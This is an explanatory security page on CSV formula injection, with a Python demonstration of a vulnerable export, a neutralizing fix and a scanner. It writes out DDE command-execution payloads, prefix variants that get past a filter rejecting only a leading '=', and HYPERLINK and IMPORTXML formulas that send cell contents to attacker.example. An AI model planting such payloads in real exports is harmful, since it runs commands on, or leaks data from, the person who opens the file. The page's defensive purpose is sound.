CSV Injection and Payloads

What is CSV Injection

CSV injection (also called formula injection) occurs when an application writes untrusted input into a comma-separated values (CSV) file without neutralizing it, and that file is later opened in a spreadsheet program such as Microsoft Excel, LibreOffice Calc or Google Sheets. The CSV itself is inert text; it is the spreadsheet that interprets a cell beginning with =, +, -, @ (or a tab or carriage return) as a formula and evaluates it. Depending on the formula, the result is execution of an external program on the victim's machine through Dynamic Data Exchange (DDE), exfiltration of other cells' contents to an attacker-controlled URL (for example via HYPERLINK, or IMPORTXML in Google Sheets), or silent tampering with the values the victim reads. The payload runs in the context of the person who opens the export, typically an administrator or analyst, not on the server that produced the file, so the bug does not by itself bypass authentication or authorization. Current versions of Excel show security prompts before DDE starts an external application, so the command-execution variant relies on the victim accepting them.

Payloads

1. DDE command execution, such as =cmd|' /C calc'!A0: the cell asks Excel to open a DDE channel to cmd.exe and pass /C calc, which starts the calculator on the machine of whoever opens the file. Any other command line can take the place of calc.

2. Alternative formula prefixes: Excel also evaluates cells that begin with +, - or @, so +2+3+cmd|' /C calc'!A0, -2+3+cmd|' /C calc'!A0 and @SUM(1+1)*cmd|' /C calc'!A0 get past a filter that only rejects a leading =.

3. Arithmetic padding, such as =2+5+cmd|' /C calc'!A0: the harmless-looking arithmetic is evaluated first and the DDE call is still reached.

4. Data exfiltration, such as =HYPERLINK("http://attacker.example/?leak="&A1&A2,"Click to view"): the contents of other cells are appended to a URL the victim is enticed to click. In Google Sheets, =IMPORTXML(CONCAT("http://attacker.example/?leak=", CONCATENATE(A2:E2)), "//a") fetches the URL automatically when the sheet is opened, without a click.

5. Header cells, data cells and fields the application treats as text, numeric, date, currency or boolean all behave identically once exported: CSV has no column types, so the only question is whether the value reaches a cell unchanged. Fields the application validates before storing them (a parsed number or date) rarely carry a payload; free-text fields such as names, addresses and comments are the usual entry point.

6. The file name of the CSV and the URL it is downloaded from are not injection points, because a spreadsheet never evaluates them. A string such as malicious.csv;cmd|' /C calc'!A0 only becomes dangerous if the application copies it into a cell of the file.
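The following Python program is an added example written for this page; it is not code from the original post. It shows in one place the mechanism described above and the payload variants in the list: a vulnerable export that writes user-submitted values straight into CSV cells, the same export with every formula-triggering cell neutralized by a leading single quote (the approach OWASP recommends), and a scanner that parses a CSV and reports each cell a spreadsheet would evaluate. The sample records and the attacker.example host are constructed for the demonstration.

```python
import csv
import io

# Cell prefixes that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula. A cell beginning with any of these is evaluated, not
# displayed as text.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample records: values an untrusted user could submit through a
# web form that an administrator later exports to CSV and opens in Excel.
SAMPLE_RECORDS = [
    {"name": "Alice Example", "note": "regular customer"},
    {"name": "=cmd|' /C calc'!A0", "note": "DDE: launch calc.exe"},
    {"name": "Bob", "note": '=HYPERLINK("http://attacker.example/?leak="&A1,"Click")'},
    {"name": "@SUM(1+1)*cmd|' /C calc'!A0", "note": "at-sign prefix variant"},
    {"name": "+44 20 7946 0000", "note": "a phone number is also a trigger"},
]


def is_formula_like(value):
    """True if a spreadsheet would evaluate this cell rather than display it."""
    return str(value).startswith(FORMULA_TRIGGERS)


def neutralize(value):
    """Make a cell inert for spreadsheet import.

    A leading single quote tells Excel/Calc/Sheets to keep the cell as text.
    Field quoting and doubling of embedded double quotes are left to the csv
    writer (QUOTE_ALL), so the value cannot break out of its field either.
    """
    text = str(value)
    if is_formula_like(text):
        return "'" + text
    return text


def export_csv(records, fields, sanitize=True):
    """Serialize records to a CSV string.

    sanitize=False reproduces the vulnerable export: user input is written
    straight into the cells and the spreadsheet evaluates it on open.
    """
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fields, quoting=csv.QUOTE_ALL,
                            lineterminator="\n")
    writer.writeheader()
    for rec in records:
        row = {f: rec.get(f, "") for f in fields}
        if sanitize:
            row = {f: neutralize(v) for f, v in row.items()}
        writer.writerow(row)
    return buf.getvalue()


def parse_csv(text):
    """Parse a CSV string into a list of rows (RFC 4180 quoting handled)."""
    return list(csv.reader(io.StringIO(text)))


def scan_csv(text):
    """Defender-side check: report every cell a spreadsheet would evaluate.

    Returns a list of (row_index, column_index, cell_value) tuples; the header
    row is index 0. Useful for reviewing an export before it is shared.
    """
    findings = []
    for r, row in enumerate(parse_csv(text)):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


if __name__ == "__main__":
    fields = ["name", "note"]
    unsafe = export_csv(SAMPLE_RECORDS, fields, sanitize=False)
    safe = export_csv(SAMPLE_RECORDS, fields)
    print("cells a spreadsheet would evaluate in the unsafe export:")
    for finding in scan_csv(unsafe):
        print("  row %d col %d: %r" % finding)
    print("cells flagged in the neutralized export:", len(scan_csv(safe)))
    print(safe)
```

The spreadsheet hides the apostrophe when it displays a neutralized cell, but the character is present in the file, so a consumer that is not a spreadsheet will see it; an export read only by other programs can rely on the quoting alone. Rejecting the trigger characters at input time is a weaker alternative, because a leading + or - is legitimate in phone numbers and negative amounts, and the scanner above is the check to run over an export that was produced by code you do not control.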
